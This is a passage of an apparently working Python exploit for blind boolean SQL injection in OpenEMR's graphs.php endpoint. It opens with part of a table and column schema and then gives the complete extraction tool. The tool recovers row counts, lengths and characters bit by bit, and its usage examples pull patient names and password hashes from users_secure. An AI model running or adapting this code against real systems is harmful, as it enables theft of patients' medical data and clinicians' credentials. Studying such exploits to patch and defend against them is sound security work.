"category",
"item",
"clin_rem_link",
"reminder_message",
"custom_flag"
],
"rule_filter": [
"id",
"include_flag",
"required_flag",
"method",
"method_detail",
"value"
],
"rule_patient_data": [
"id",
"date",
"pid",
"category",
"item",
"complete",
"result"
],
"rule_reminder": [
"id",
"method",
"method_detail",
"value"
],
"rule_target": [
"id",
"group_id",
"include_flag",
"required_flag",
"method",
"value",
"interval"
],
"sequences": [
"id"
],
"session_tracker": [
"uuid",
"created",
"last_updated",
"number_scripts"
],
"shared_attributes": [
"pid",
"encounter",
"field_id",
"last_update",
"user_id",
"field_value"
],
"standardized_tables_track": [
"id",
"imported_date",
"name",
"revision_version",
"revision_date",
"file_checksum"
],
"supported_external_dataloads": [
"load_id",
"load_type",
"load_source",
"load_release_date",
"load_filename",
"load_checksum"
],
"syndromic_surveillance": [
"id",
"lists_id",
"submission_date",
"filename"
],
"template_users": [
"tu_id",
"tu_user_id",
"tu_facility_id",
"tu_template_id",
"tu_template_order"
],
"therapy_groups": [
"group_id",
"group_name",
"group_start_date",
"group_end_date",
"group_type",
"group_participation",
"group_status",
"group_notes",
"group_guest_counselors"
],
"therapy_groups_counselors": [
"group_id",
"user_id"
],
"therapy_groups_participants": [
"group_id",
"pid",
"group_patient_status",
"group_patient_start",
"group_patient_end",
"group_patient_comment"
],
"therapy_groups_participant_attendance": [
"form_id",
"pid",
"meeting_patient_comment",
"meeting_patient_status"
],
"track_events": [
"id",
"event_type",
"event_label",
"event_url",
"event_target",
"first_event",
"last_event",
"label_count"
],
"transactions": [
"id",
"date",
"title",
"pid",
"user",
"groupname",
"authorized"
],
"users": [
"id",
"uuid",
"username",
"password",
"authorized",
"info",
"source",
"fname",
"mname",
"lname",
"suffix",
"federaltaxid",
"federaldrugid",
"upin",
"facility",
"facility_id",
"see_auth",
"active",
"npi",
"title",
"specialty",
"billname",
"email",
"email_direct",
"google_signin_email",
"url",
"assistant",
"organization",
"valedictory",
"street",
"streetb",
"city",
"state",
"zip",
"street2",
"streetb2",
"city2",
"state2",
"zip2",
"phone",
"fax",
"phonew1",
"phonew2",
"phonecell",
"notes",
"cal_ui",
"taxonomy",
"calendar",
"abook_type",
"default_warehouse",
"irnpool",
"state_license_number",
"weno_prov_id",
"newcrop_user_role",
"cpoe",
"physician_type",
"main_menu_role",
"patient_menu_role",
"portal_user",
"supervisor_id",
"billing_facility",
"billing_facility_id",
"date_created",
"last_updated",
"country_code",
"country_code2"
],
"users_facility": [
"tablename",
"table_id",
"facility_id",
"warehouse_id"
],
"users_secure": [
"id",
"username",
"password",
"last_update_password",
"last_update",
"password_history1",
"password_history2",
"password_history3",
"password_history4",
"last_challenge_response",
"login_work_area",
"total_login_fail_counter",
"login_fail_counter",
"last_login_fail",
"auto_block_emailed"
],
"user_settings": [
"setting_user",
"setting_label",
"setting_value"
],
"uuid_mapping": [
"id",
"uuid",
"resource",
"resource_path",
"table",
"target_uuid",
"created"
],
"uuid_registry": [
"uuid",
"table_id",
"table_vertical",
"couchdb",
"document_drive",
"mapped",
"created"
],
"valueset": [
"nqf_code",
"code",
"code_system",
"code_type",
"valueset",
"description",
"valueset_name"
],
"valueset_oid": [
"nqf_code",
"code",
"code_system",
"code_type",
"valueset",
"description",
"valueset_name"
],
"verify_email": [
"id",
"pid_holder",
"email",
"language",
"fname",
"mname",
"lname",
"dob",
"token_onetime",
"active"
],
"version": [
"v_major",
"v_minor",
"v_patch",
"v_realpatch",
"v_tag",
"v_database",
"v_acl"
],
"voids": [
"void_id",
"patient_id",
"encounter_id",
"what_voided",
"date_original",
"date_voided",
"user_id",
"amount1",
"amount2",
"other_info",
"reason",
"notes"
],
"x12_partners": [
"id",
"name",
"id_number",
"x12_sender_id",
"x12_receiver_id",
"processing_format",
"x12_isa01",
"x12_isa02",
"x12_isa03",
"x12_isa04",
"x12_isa05",
"x12_isa07",
"x12_isa14",
"x12_isa15",
"x12_gs02",
"x12_per06",
"x12_dtp03",
"x12_gs03",
"x12_submitter_id",
"x12_submitter_name",
"x12_sftp_login",
"x12_sftp_pass",
"x12_sftp_host",
"x12_sftp_port",
"x12_sftp_local_dir",
"x12_sftp_remote_dir",
"x12_token_endpoint",
"x12_eligibility_endpoint",
"x12_claim_status_endpoint",
"x12_attachment_endpoint",
"x12_client_id",
"x12_client_secret"
],
"x12_remote_tracker": [
"id",
"x12_partner_id",
"x12_filename",
"status",
"claims",
"messages",
"created_at",
"updated_at"
]
}
current_string_size = 0
current_line_number = 0
last_string_id = ""
def _bits_to_int(bits: str) -> int:
return int(bits, 2)
def generate_length_bit_queries(table: str, column: str, offset: int, max_bits: int = 8):
"""
Generates SQL queries to extract each bit of the LENGTH(column) value.
:param table: SQL table name
:param column: Column name
:param offset: OFFSET for LIMIT 1
:param max_bits: Number of bits to extract (default 8 for max length 255)
:yield: SQL query string for each bit
"""
for bit in range(max_bits):
div_value = 2 ** bit
yield f'length {table}.{column} {offset}', (
f"(SELECT ((LENGTH({column}) DIV {div_value}) MOD 2) "
f"FROM {table} "
f"LIMIT 1 OFFSET {offset})"
)
yield f'length {table}.{column} {offset}', None
def generate_char_bit_queries(table: str, column: str, offset: int, char_position: int, bit_count: int = 8):
"""
Generates SQL queries to extract each bit of a character.
:param table: SQL table name
:param column: Column name
:param offset: OFFSET for LIMIT 1
:param char_position: Character index (1-based)
:param bit_count: Number of bits (default 8 for ASCII)
:yield: SQL query string for each bit of the character
"""
for bit in range(bit_count):
div_value = 2 ** bit
yield f'ascii {table} {column} {offset} {char_position}', (
f"(SELECT ((ASCII(SUBSTRING({column},{char_position},1)) DIV {div_value}) MOD 2) "
f"FROM {table} "
f"LIMIT 1 OFFSET {offset})"
)
yield f'ascii {table} {column} {offset} {char_position}', None
def generate_full_string_bit_queries(table: str, column: str, offset: int, max_length_bits: int = 8, char_bit_count: int = 8):
"""
Generates all SQL bitwise queries to extract a full string.
1. Queries for the length (bitwise)
2. Queries for each character (bitwise)
:param table: SQL table name
:param column: Column name
:param offset: OFFSET for LIMIT 1
:param max_length_bits: Number of bits for length (default 8)
:param char_bit_count: Number of bits per character (default 8)
:yield: SQL query string
"""
yield from generate_length_bit_queries(table, column, offset, max_bits=max_length_bits)
for char_pos in range(1, current_string_size + 1):
yield from generate_char_bit_queries(table, column, offset, char_pos, bit_count=char_bit_count)
yield 'string', None
def generate_row_count_bit_queries(table: str, max_bits: int = 16):
"""
Generates SQL queries to extract the number of rows in a table
using a bitwise approach.
Each query tests a single bit of COUNT(*).
:param table: Table name
:param max_bits: Number of bits to extract (default 16 for up to 65535 rows)
:yield: SQL query string
"""
for bit in range(max_bits):
div_value = 2 ** bit
yield "count " + table, (
f"(SELECT ((COUNT(*) DIV {div_value}) MOD 2) "
f"FROM {table})"
)
yield 'count ' + table, None
def generate_all_rows_multiple_columns_bit_queries(table: str, columns: list, max_rows_bits: int = 16, length_bits: int = 8, char_bits: int = 8):
"""
Generates all SQL bitwise queries to extract multiple columns
from all rows in a table.
1. First yields queries to determine the number of rows (bitwise)
2. Then, for each row (offset), yields bitwise queries for each column.
:param table: Table name
:param columns: List of column names to extract
:param max_rows_bits: Number of bits for row count (default 16)
:param length_bits: Number of bits for length extraction per column (default 8)
:param char_bits: Number of bits per character (default 8)
:yield: SQL query string
"""
yield from generate_row_count_bit_queries(table, max_bits=max_rows_bits)
for offset in range(current_line_number):
for column in columns:
yield from generate_full_string_bit_queries(
table,
column,
offset,
max_length_bits=length_bits,
char_bit_count=char_bits
)
def fetch(host, condition, cookie_value, csrf_token, resource="/library/ajax/graphs.php"):
"""
Perform an HTTPS POST request to the specified host with the given
query parameters and OpenEMR cookie.
SSL certificate verification is disabled (equivalent to curl -k).
:param host: Target IP address or hostname
:param cookie_value: Value of the OpenEMR session cookie
:param csrf_token: Value of the OpenEMR CSRF token
:param params: Dictionary of GET parameters
:param resource: Path to the target resource
:return: Raw response body as bytes
"""
params = {
"table": "LBF",
"title": "",
"name": (
"date, 1 FROM (SELECT 1 AS field_value) AS ld JOIN "
"(SELECT 1 AS n UNION ALL SELECT 2 UNION ALL SELECT"
" 3 UNION ALL SELECT 4 UNION ALL SELECT 5) AS numbers"
f" WHERE {condition} UNION ALL SELECT ld.field_value AS date"
),
}
params["csrf_token_form"] = csrf_token
content = urlencode(params, safe="()")
url = f"https://{host}{resource}"
context = _create_unverified_context()
req = Request(url, data=content.encode())
req.add_header("Cookie", f"OpenEMR={cookie_value}")
with urlopen(req, context=context) as response:
return response.read()
def process(results: dict, name: str):
"""
Post-process a results entry based on its name prefix.
- If name starts with "count", convert bits to int and update global current_line_number.
- If name starts with "length", convert bits to int and update global current_string_size.
- If name starts with "ascii", convert bits to int, then to chr, update the results dict,
and store the name in global last_string_id.
- If name starts with "string", concatenate all characters corresponding to
last_string_id (from results) to form the full string.
Assumes a function `_bits_to_int(bits: str) -> int` exists.
:param results: Dict storing the bit strings or computed characters.
:param name: The key in results to process.
"""
global current_line_number, current_string_size, last_string_id
value = results[name]
if name.startswith("count"):
val_int = _bits_to_int(value)
current_line_number = val_int
results[name] = val_int
print("[#] Row count for table:", name.split()[1], val_int)
elif name.startswith("length"):
val_int = _bits_to_int(value)
current_string_size = val_int
results[name] = val_int
_, table_column, offset = name.split()
print("[#] String length:", table_column, offset, val_int)
elif name.startswith("ascii"):
char = results[name] = chr(_bits_to_int(value))
last_string_id = name
print("[>] Character recovered:", char)
elif name.startswith("string"):
if last_string_id is None:
results[name] = ""
return
characters = ""
*identifiers, position = last_string_id.split()
identifiers = " ".join(identifiers)
for position in range(1, int(position) + 1):
character = results[identifiers + " " + str(position)]
characters += character
print("[+] Extracted string:", identifiers, characters)
last_string_id = None
def identify_boolean_via_checksum(host, cookie_value, csrf_token, *args, resource="/library/ajax/graphs.php", **kwargs):
"""
Identify boolean behavior (0 or 1) by comparing response content.
Workflow:
1. Iterate over values yielded by `generate_all_rows_multiple_columns_bit_queries`.
2. Classify the value as logical 0 or 1 depending on content response match.
:param host: Target IP address or hostname
:param cookie_value: OpenEMR session cookie value
:param csrf_token: Value of the OpenEMR CSRF token
:param resource: Target resource path
:return: Dictionary mapping payload -> identified boolean (0/1/None)
"""
results = defaultdict(str)
for name, payload in generate_all_rows_multiple_columns_bit_queries(*args, **kwargs):
if payload is None:
process(results, name)
continue
response = fetch(
host,
payload,
cookie_value,
csrf_token,
resource
)
if len(response):
results[name] = "1" + results[name]
else:
results[name] = "0" + results[name]
return results
def parse_arguments():
"""
Parse command-line arguments for the OpenEMR boolean checker.
Mandatory arguments:
- host : Target host/IP
- cookie : OpenEMR session cookie
- csrf-token : OpenEMR csrf token
- table : Table name (must exist in schema.json)
- columns : One or more column names (must exist in schema.json[table])
Optional arguments:
- --path : Resource path (default: /library/ajax/graphs.php)
- --list-schema : Display all available tables and columns and exit
:return: argparse.Namespace with attributes: host, cookie, csrf-token, table, columns, path
"""
parser = ArgumentParser(
description="Boolean-based OpenEMR checker using SHA1 comparison"
)
parser.add_argument("host", help="Target host/IP (mandatory)")
parser.add_argument("cookie", help="OpenEMR session cookie (mandatory)")
parser.add_argument("csrf_token", help="OpenEMR csrf token (mandatory)")
parser.add_argument("table", help="Table name (mandatory)")
parser.add_argument("--columns", required=True, action="extend", nargs='+', help="Column names (at least one required)")
parser.add_argument("--path", default="/library/ajax/graphs.php", help="Resource path (default: /library/ajax/graphs.php)")
parser.add_argument("--list-schema", action="store_true", help="List all tables and columns from JSON and exit")
args = parser.parse_args()
if args.list_schema:
print("Available tables and columns:")
for table, cols in schema.items():
print(f"- {table}: {', '.join(cols)}")
exit(0)
if args.table not in schema:
parser.error(f"Table '{args.table}' not found in schema")
invalid_cols = [c for c in args.columns if c not in schema[args.table]]
if invalid_cols:
parser.error(f"Invalid column(s) for table '{args.table}': {', '.join(invalid_cols)}")
return args
def main():
"""
Main entry point of the OpenEMR SQL Injection exploit.
Workflow:
1. Parse command-line arguments (host, cookie, table, columns, optional path).
2. Validate that the table and columns exist in the schema JSON.
3. Call `identify_boolean_via_checksum` with the provided arguments.
4. Display the results.
Usage example:
python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 patient_data --columns fname mname lname
python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 users_secure --columns username password password_history1 password_history2 password_history3 password_history4
"""
arguments = parse_arguments()
identify_boolean_via_checksum(
arguments.host,
arguments.cookie,
arguments.csrf_token,
arguments.table,
arguments.columns,
resource=arguments.path
)
main()